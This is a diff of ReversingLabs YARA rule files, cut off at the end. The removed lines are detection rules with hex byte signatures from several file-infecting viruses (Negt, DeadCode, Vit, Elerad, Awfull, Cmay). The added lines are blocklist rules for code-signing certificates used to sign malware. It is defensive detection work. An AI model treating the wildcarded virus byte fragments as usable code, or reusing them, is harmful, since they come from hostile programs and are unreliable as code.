strings: - $negt_body_and_infector_1 = { - 6A 00 E8 99 08 00 00 A3 ?? ?? ?? ?? 68 04 01 00 00 68 ?? ?? ?? ?? 6A 00 E8 7D 08 00 00 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 48 08 00 00 BB 00 00 00 00 8D 05 ?? ?? ?? ?? FE 00 68 ?? ?? ?? ?? E8 2D 00 00 00 43 83 FB 18 7C E8 E8 92 08 00 00 - 3C 9F 7F 17 6A 01 68 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 6A 00 6A 00 E8 7D 08 00 00 6A 00 E8 10 08 00 00 55 8B EC 81 C4 B8 - FD FF FF FF 75 08 E8 35 08 00 00 0B C0 0F 84 C2 00 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 F2 07 00 00 89 85 BC FE - FF FF 83 BD BC FE FF FF FF 0F 84 9E 00 00 00 8D 9D EE FE FF FF 53 E8 21 08 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? - ?? 56 E8 01 08 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 F4 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 E7 07 00 00 23 D8 68 ?? ?? ?? ?? - 56 E8 DA 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 CD 07 00 00 23 D8 83 FB 00 74 28 FF 75 08 68 ?? ?? ?? ?? E8 BF 07 00 00 8D - 85 EE FE FF FF 50 68 ?? ?? ?? ?? E8 A2 07 00 00 68 ?? ?? ?? ?? E8 08 01 00 00 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 - 50 07 00 00 83 F8 00 0F 85 62 FF FF FF FF B5 BC FE FF FF E8 30 07 00 00 8D 85 C2 FE FF FF 50 68 ?? ?? ?? ?? E8 25 07 00 - 00 89 85 BC FE FF FF 83 BD BC FE FF FF FF 0F 84 AF 00 00 00 8D BD C2 FE FF FF 8B 07 66 83 E0 10 0F 84 82 00 00 00 8D 9D - } - $negt_body_and_infector_2 = { - EE FE FF FF 53 E8 42 07 00 00 8B F3 BB 00 00 00 00 F7 D3 68 ?? ?? ?? ?? 56 E8 22 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 15 - 07 00 00 23 D8 68 ?? ?? ?? ?? 56 E8 08 07 00 00 23 D8 83 FB 00 74 41 FF 75 08 8D 85 B8 FD FF FF 50 E8 F8 06 00 00 8D 85 - EE FE FF FF 50 8D 85 B8 FD FF FF 50 E8 D9 06 00 00 68 ?? ?? ?? ?? 8D 85 B8 FD FF FF 50 E8 C8 06 00 00 60 8D 85 B8 FD FF - FF 50 E8 63 FE FF FF 61 8D 85 C2 FE FF FF 50 FF B5 BC FE FF FF E8 72 06 00 00 83 F8 00 0F 85 51 FF FF FF FF B5 BC FE FF - FF E8 52 06 00 00 C9 C2 04 00 55 8B EC 81 C4 E4 E9 FF FF 51 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 68 00 00 00 C0 FF 75 - 08 E8 1E 06 00 00 83 F8 FF 75 05 E9 AE 03 00 00 89 45 FC 6A 00 6A 00 6A 3C FF 75 FC E8 45 06 00 00 6A 00 8D 45 F0 50 6A - 04 8D 45 F4 50 FF 75 FC E8 25 06 00 00 6A 00 6A 00 FF 75 F4 FF 75 FC E8 22 06 00 00 6A 00 8D 45 F0 50 68 20 01 00 00 68 - ?? ?? ?? ?? FF 75 FC E8 FE 05 00 00 8B 5D F4 83 EB 0B 6A 00 6A 00 53 FF 75 FC E8 F7 05 00 00 6A 00 8D 45 F0 50 6A 0B 68 - ?? ?? ?? ?? FF 75 FC E8 D6 05 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 E5 05 00 00 0B C0 75 05 E9 12 03 00 00 81 3D ?? ?? - ?? ?? 50 45 00 00 74 05 E9 01 03 00 00 0F B7 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 03 45 F4 83 C0 18 0F B7 0D ?? ?? ?? ?? - 03 C1 83 C0 28 3B 05 ?? ?? ?? ?? 76 05 E9 D4 02 00 00 A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 0F B7 - } - $negt_body_and_infector_3 = { - 05 ?? ?? ?? ?? B9 28 00 00 00 F7 E1 83 C0 04 03 45 F4 83 C0 14 05 E0 00 00 00 89 45 EC C7 05 ?? ?? ?? ?? 2E 45 41 54 C7 - 05 ?? ?? ?? ?? 55 02 00 00 FF 35 ?? ?? ?? ?? 8F 05 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 A3 ?? - ?? ?? ?? 8B 45 EC 83 E8 18 6A 00 6A 00 50 FF 75 FC E8 10 05 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E8 50 FF 75 FC E8 F0 04 - 00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E4 50 FF 75 FC E8 DC 04 00 00 8B 45 E8 03 45 E4 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00 - 00 00 00 C7 05 ?? ?? ?? ?? 00 00 00 00 66 C7 05 ?? ?? ?? ?? 00 00 66 C7 05 ?? ?? ?? ?? 00 00 C7 05 ?? ?? ?? ?? 20 00 00 - E0 6A 00 6A 00 FF 75 EC FF 75 FC E8 9E 04 00 00 6A 00 8D 45 F0 50 6A 28 68 ?? ?? ?? ?? FF 75 FC E8 8F 04 00 00 68 ?? ?? - ?? ?? E8 61 04 00 00 68 ?? ?? ?? ?? E8 63 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 48 04 00 00 A3 ?? - ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 33 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 1E 04 00 00 - A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 09 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 F4 03 - 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 DF 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 - CA 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 B5 03 00 00 A3 ?? ?? ?? ?? 6A 02 6A 00 6A 00 FF 75 FC E8 - BA 03 00 00 6A 00 8D 45 F0 50 FF 35 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 50 FF 75 FC E8 A5 03 00 00 66 FF 05 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 03 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A 00 6A 00 - } - $negt_body_and_infector_4 = { - FF 75 F4 FF 75 FC E8 63 03 00 00 6A 00 8D 45 F0 50 68 F8 00 00 00 68 ?? ?? ?? ?? FF 75 FC E8 51 03 00 00 83 6D F4 0B 6A - 00 6A 00 FF 75 F4 FF 75 FC E8 38 03 00 00 6A 00 8D 45 F0 50 6A 0B 68 ?? ?? ?? ?? FF 75 FC E8 29 03 00 00 6A 00 6A 20 6A - 03 6A 00 6A 01 68 00 00 00 80 68 ?? ?? ?? ?? E8 C8 02 00 00 89 45 F8 6A 00 6A 00 6A 00 FF 75 F8 E8 F9 02 00 00 6A 00 8D - 45 F0 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 F8 E8 D3 02 00 00 8B 75 F0 6A 02 6A 00 6A 00 FF 75 FC E8 CE 02 00 00 - 6A 00 8D 45 F0 50 56 8D 85 ?? ?? ?? ?? 50 FF 75 FC E8 BE 02 00 00 FF 75 FC E8 62 02 00 00 FF 75 F8 E8 5A 02 00 00 59 C9 - C2 04 00 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 - FF 95 ?? ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A - 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? - ?? FF 95 ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 - 01 00 00 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 - 50 53 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? - FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3 - } - $negt_infector = { - E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 FF 95 ?? - ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 6A 20 - 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? ?? FF 95 - ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 01 00 00 - FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 50 53 FF - B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? - ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3 - } - condition: - uint16(0)==0x5A4D and (($negt_infector at pe.entry_point) or (($negt_body_and_infector_1 at pe.entry_point) and $negt_body_and_infector_2 and $negt_body_and_infector_3 and $negt_body_and_infector_4)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BS TEHNIK d.o.o." and (pe.signatures[i].serial=="00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" or pe.signatures[i].serial=="f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00") and 1606953600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Deadcode : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE { meta: - description = "Yara rule that detects DeadCode virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "89ec2e39-a163-5ba6-9b19-9c94b1923d47" - date = "2020-07-15" - modified = "2020-07-15" + id = "fd1b83aa-bfcc-590c-8f97-875badf09698" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.DeadCode.yara#L3-L76" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6ac2e48daaed222f0a19afd4d03a02834705e0e3762db3217f68569554171846" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11498-L11514" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9ec7e84c77583bd52ccfb8d6d5831f3634ed0a401d8103376c4775b7f2c43d81" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "DeadCode" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $deadcode_ep_1 = { - 64 67 FF 36 30 00 58 8B 40 08 FF 70 48 5B FF 70 4C 5A 03 40 44 - FF E0 - } - $deadcode_marker = { - DE C0 AD DE - } - $deadcode_ep_2 = { - 2B C0 85 C0 74 0E 64 67 FF 36 00 00 64 67 89 26 00 00 89 00 E8 - ED FF FF FF 8B 74 24 0C 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 - 4C 03 40 44 89 86 B8 00 00 00 89 86 B0 00 00 00 89 9E A4 00 00 - 00 89 96 A8 00 00 00 2B C0 C3 - } - $deadcode_ep_3 = { - B8 DE C0 AD DE 50 5A 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 4C - 03 40 44 FF D0 - } - $deadcode_body_1 = { - 8B D0 8B EA 81 C5 ?? ?? ?? ?? 89 85 A4 00 00 00 89 9D C0 00 00 00 E8 56 01 00 00 89 - 45 00 8D 75 04 81 C2 ?? ?? ?? ?? 6A 19 FF 75 00 52 56 E8 CE 01 00 00 64 67 A1 30 00 - 8B 40 08 89 85 88 00 00 00 C7 85 D0 00 00 00 ?? ?? ?? ?? E8 09 00 00 00 8B 64 24 08 - E9 03 01 00 00 33 D2 64 FF 32 64 89 22 83 BD C0 00 00 00 00 75 2F 6A 04 68 00 10 00 - 00 68 40 01 00 00 6A 00 FF 55 08 50 8F 45 78 E8 2A 03 00 00 68 00 40 00 00 68 40 01 - 00 00 FF 75 78 FF 55 28 E9 C3 00 00 00 8B 85 A4 00 00 00 05 ?? ?? ?? ?? 8D B5 B4 00 - 00 00 56 6A 00 55 50 68 00 00 10 00 6A 00 FF 55 30 89 85 AC 00 00 00 6A 04 68 00 10 - 00 00 6A 54 6A 00 FF 55 08 89 85 A8 00 00 00 64 67 A1 30 00 8B 40 10 8B 40 3C 8B B5 - A8 00 00 00 8D 7E 10 56 57 6A 00 6A 00 6A 04 6A 01 6A 00 6A 00 50 6A 00 FF 55 50 85 - C0 74 5D FF 76 04 8F 85 B0 00 00 00 64 67 A1 30 00 8B 40 08 8B D8 03 5B 3C 8B 5B 28 - 03 D8 8B 8D A4 00 00 00 81 ?? ?? ?? ?? 8D 85 B4 00 00 00 50 6A ?? 51 53 FF 36 FF 55 - 4C FF 76 04 FF 55 54 8D B5 AC 00 00 00 6A FF 6A 01 56 6A 02 FF 55 34 68 00 40 00 00 - 6A 54 FF B5 A8 00 00 00 FF 55 28 33 D2 64 8F 02 5A E8 DB 01 00 00 E8 F5 00 00 00 6A - 00 FF 55 3C 64 67 8B 36 00 00 AD 83 F8 FF 74 04 8B F0 EB F6 8B 7E 04 81 E7 00 00 FF - FF 66 81 3F 4D 5A 74 08 81 EF 00 00 01 00 EB F1 8B DF 03 5B 3C 66 81 3B 50 45 74 02 - EB E3 8B C7 C3 55 8B EC 8B 75 0C AC 84 C0 75 FB 2B 75 0C 8B CE 8B 5D 08 03 5B 3C 8B - 5B 78 03 5D 08 8B 53 20 03 55 08 2B C0 8B 32 03 75 08 8B 7D 0C 51 FC F3 A6 59 74 06 - } - $deadcode_body_2 = { - 83 C2 04 40 EB EB 8B 73 24 03 75 08 2B D2 66 8B 14 46 8B 73 1C 03 75 08 8B 04 96 03 - 45 08 8B E5 5D C2 08 00 55 8B EC 8B 7D 08 8B 75 0C 8B 4D 14 51 56 57 56 FF 75 10 E8 - 91 FF FF FF 5F 5E 59 AB AC 84 C0 75 FB E2 E9 8B E5 5D C2 10 00 8B 6C 24 04 6A 04 68 - 00 10 00 00 68 40 01 00 00 6A 00 FF 55 08 85 C0 74 18 89 45 78 E8 63 01 00 00 68 00 - 40 00 00 68 40 01 00 00 FF 75 78 FF 55 28 6A 00 FF 55 40 C3 - } - condition: - uint16(0)==0x5A4D and ((($deadcode_ep_1 at pe.entry_point) and ($deadcode_marker at 0x40)) or (($deadcode_ep_2 at pe.entry_point) and ($deadcode_marker at 0x40)) or (($deadcode_ep_3 at pe.entry_point) and ($deadcode_marker at 0x40)) or ($deadcode_body_1 and $deadcode_body_2)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Power Save Systems s.r.o." and pe.signatures[i].serial=="47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" and 1647302400<=pe.signatures[i].not_after) } -import "elf" +import "pe" -rule REVERSINGLABS_Linux_Virus_Vit : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE { meta: - description = "Yara rule that detects Vit virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4515fe43-4c5a-521d-82b7-273823f0c64e" - date = "2024-09-08" - date = "2024-09-08" - modified = "2023-06-07" + id = "727167de-5678-558d-b948-8a40839d0500" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Linux.Virus.Vit.yara#L3-L36" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2fba7a081dfca85aee5c7f3b33414b799ed52ca6aa5bbf031da040aaa75acde9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11516-L11534" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e275a1fd2eb931030fa8b5fc11cd1b335835aaa553a42455053cb93fef5e6e72" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $vit_entry_point = { - 55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4 - CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7 - 85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8 - 18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA - FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56 - E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9 - FF FF BE FF FF FF FF 6A 00 6A 00 E9 - } - $vit_str = "vi324.tmp" - condition: - uint32(0)==0x464C457F and $vit_entry_point at elf.entry_point and $vit_str + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SMART TOYS AND GAMES, INC" and (pe.signatures[i].serial=="00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" or pe.signatures[i].serial=="9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7") and 1601683200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Elerad : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE { meta: - description = "Yara rule that detects Elerad virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0307a136-ea2c-584c-bfda-f41e2c46fd09" - date = "2020-07-15" - modified = "2020-07-15" + id = "0a196a18-002e-58e4-bff2-83d1a67a82ce" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.Elerad.yara#L3-L33" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "930594bf99daf55ef02542ce7b393c1c23ead75946b3da3b555102a2e7142e33" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11536-L11554" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2a9f13f5e79a12f7e9d9d4a0dcaac065e1fc5167c67bc9f3fd7ba1c374b26d96" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "Elerad" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $elerad_body = { - EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74 - 08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE - 00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB - 20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81 - ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40 - 00 31 10 83 C0 04 E2 F9 - } - condition: - uint16(0)==0x5A4D and ($elerad_body at pe.entry_point) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" or pe.signatures[i].serial=="c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c") and 1643500800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Awfull : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE { meta: - description = "Yara rule that detects Awfull virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "34104923-b401-5d39-883b-aa9a5a8e64f3" - date = "2020-07-15" - modified = "2020-07-15" + id = "c6e93547-5be0-5303-b537-655db3d78ad4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.Awfull.yara#L3-L33" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "84a4faee4cbbb3387ad25bd9230c6482b8db461bc008312bc782f23e3df2eae3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11556-L11574" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "691b57929c93d14f8700e0e61170b9248499fd36b80aec90f2054c32d6a3a9eb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "Awfull" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $awfull_body = { - 60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256] - 33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02 - 5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA - EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ?? - [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ?? - 56 5F AC F6 D0 AA 49 E3 02 EB F7 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Genezis" and (pe.signatures[i].serial=="00:c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" or pe.signatures[i].serial=="c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd") and 1615161600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a61e61c1-9fa0-5fd9-b197-bb9d1b68c8f4" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11576-L11592" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5f151ee5781a15cca4394fdd8200162eae47e9d088a0b1551c9ed22ce11473a2" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($awfull_body at pe.entry_point) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SpiffyTech Inc." and pe.signatures[i].serial=="06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" and 1634515201<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Cmay : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE { meta: - description = "Yara rule that detects Cmay virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d61e09f1-1d3f-5e1e-9884-25f1a465e88d" - date = "2020-07-15" - modified = "2020-07-15" + id = "2a15d527-7f42-5c56-9740-9c2503a66f4f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.Cmay.yara#L3-L73" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f3bdf772eb80c632a913621732d12ae4a02bc7d3ba41f51711aa329be2ca6220" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11594-L11610" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "40b78005d343684d08bb93e92c51eee10e674e8deb9eec290bc9ffe3b23061b1" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "Cmay" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $cmay_body_1 = { - 60 66 9C E8 00 00 00 00 5D 8B C5 81 ED ?? ?? ?? ?? 2D 08 00 00 00 2D - ?? ?? ?? ?? 89 85 ?? 